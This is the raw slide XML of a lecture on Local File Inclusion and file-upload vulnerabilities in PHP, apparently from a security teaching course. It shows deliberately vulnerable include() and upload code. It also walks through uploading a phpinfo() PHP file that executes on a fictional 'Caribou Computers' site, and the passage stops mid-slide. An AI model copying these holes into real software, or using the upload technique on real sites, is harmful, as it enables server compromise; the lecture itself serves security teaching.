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68" r:id="rId2"/>
    <p:sldId id="367" r:id="rId3"/>
    <p:sldId id="415" r:id="rId4"/>
    <p:sldId id="410" r:id="rId5"/>
    <p:sldId id="407" r:id="rId6"/>
    <p:sldId id="408" r:id="rId7"/>
    <p:sldId id="409" r:id="rId8"/>
    <p:sldId id="425" r:id="rId9"/>
    <p:sldId id="411" r:id="rId10"/>
    <p:sldId id="414" r:id="rId11"/>
    <p:sldId id="412" r:id="rId12"/>
    <p:sldId id="413" r:id="rId13"/>
    <p:sldId id="416" r:id="rId14"/>
    <p:sldId id="426" r:id="rId15"/>
    <p:sldId id="417" r:id="rId16"/>
    <p:sldId id="418" r:id="rId17"/>
    <p:sldId id="433" r:id="rId18"/>
    <p:sldId id="419" r:id="rId19"/>
    <p:sldId id="435" r:id="rId20"/>
    <p:sldId id="434" r:id="rId21"/>
    <p:sldId id="427" r:id="rId22"/>
    <p:sldId id="428" r:id="rId23"/>
    <p:sldId id="436" r:id="rId24"/>
    <p:sldId id="437" r:id="rId25"/>
    <p:sldId id="421" r:id="rId26"/>
    <p:sldId id="429" r:id="rId27"/>
    <p:sldId id="422" r:id="rId28"/>
    <p:sldId id="438" r:id="rId29"/>
    <p:sldId id="439" r:id="rId30"/>
    <p:sldId id="430" r:id="rId31"/>
    <p:sldId id="424" r:id="rId32"/>
    <p:sldId id="431" r:id="rId33"/>
    <p:sldId id="43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FF3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21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5/7/2023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5/7/2023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acktips.it/wordpress-root-hackademic/" TargetMode="External"/><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de.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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de.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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de.wikipedia.org/wiki/Netcat"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de.wikipedia.org/wiki/Netcat"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e.wikipedia.org/wiki/Netcat"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s://www.cyberciti.biz/faq/understanding-etcshadow-file/"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07DDD9-44B9-4DDC-AD36-6E0E9096375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1689" b="21689"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15" y="10"/>
            <a:ext cx="12191985" cy="4578340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148F256B-1C20-47A6-92E3-6CAFC3E4BF92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="4799362"/>
            <a:ext cx="10113645" cy="743682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Development &amp; Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918AA328-CC01-4A3F-8A04-FA3FA838E6FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="5715000"/>
            <a:ext cx="10113264" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lecture 12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Local File Inclusion (LFI) and Uploading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{303A4B1D-575F-4373-BBD1-AF7B812E2DFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15" y="4578350"/>
            <a:ext cx="12191985" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://hacktips.it/wordpress-root-hackademic/"/>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378297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111B03D3-32D9-4458-9C08-3F2065C45C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="2175029"/>
            <a:ext cx="6013520" cy="4017159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t" anchorCtr="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 Security code goes here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Database setup code goes here</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$file = $_GET['page’];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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($file)) {				     include($file);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else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include("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_main.php</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?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Cleanup code goes here.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Multi-page Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA087FA3-FB63-48BF-851B-DADF6B53888F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948873" y="2176229"/>
            <a:ext cx="4334645"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heart of this is the PHP statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>include()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>It takes any PHP file and effectively inserts it into the same spot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>All the variables from the code before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>include()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> get carried into the included code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187871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111B03D3-32D9-4458-9C08-3F2065C45C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="2175029"/>
            <a:ext cx="6013520" cy="4017159"/>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 Security check goes here</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When security check succeeds</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$username = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetchedName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;username;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$authenticated = True;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Multi-page Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA087FA3-FB63-48BF-851B-DADF6B53888F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948873" y="2176229"/>
            <a:ext cx="4334645"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We also set a few variables that can be used by the other web pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="471729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111B03D3-32D9-4458-9C08-3F2065C45C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="3773010"/>
            <a:ext cx="10490208" cy="2419178"/>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if ( $authenticated === True and $username == "administrator" ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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("&lt;h1&gt;Administrative Page&lt;/h1&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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("&lt;h1 style='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text-align:center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'&gt;Access Denied&lt;/h1&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Multi-page Architectures</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10490208"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Then in the pages that “includer” includes we can do checks to make sure that they can’t be run on their own.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2331457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111B03D3-32D9-4458-9C08-3F2065C45C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="3745889"/>
            <a:ext cx="10552352" cy="2446299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="77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&lt;form  method="post" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="multipart/form-data"&gt;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Select image to upload:</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type="file" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileToUpload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileToUpload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;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type="submit" value="Upload Image" name="submit"&gt;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&lt;/form&gt;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 $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>target_file</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target_dir</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basename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_FILES["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileToUpload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"]["name"]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_POST["submit"]))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$check = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_FILES["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileToUpload</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tmp_name</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move_uploaded_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_FILES["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fileToUpload</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tmp_name</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target_file</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?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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File Uploads</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1034816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Allowing strangers to put files on your machine is always problematic from a security posture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PHP places the file in a temporary directory until you tell it to move it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Where the file is tracked by a variable called $_FILES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1030129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Reconnaissance </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10490208"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Once we see the new Caribou Computers site we will look around.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We take special note that an upload site has been added.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The first thing we want to find out is what kinds of files can be uploaded?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We try several image files.  We notice that a .JPG is uploaded and displayed BUT a .PNG file doesn’t get displayed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>By looking at the HTML for the page we can see the directory where the images are getting uploaded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We can point our browser to the URL of the image and load it directly.  This should make us wonder if we can do that for the PNG file that didn’t display</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This works.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1124691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Reconnaissance </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10490208" cy="2677656"/>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next thing we can try is a PHP file.  Something simple like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Once we upload that, we point our browser to the URL it should be at (inside the upload directory) and notice that the PHP we uploaded executes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
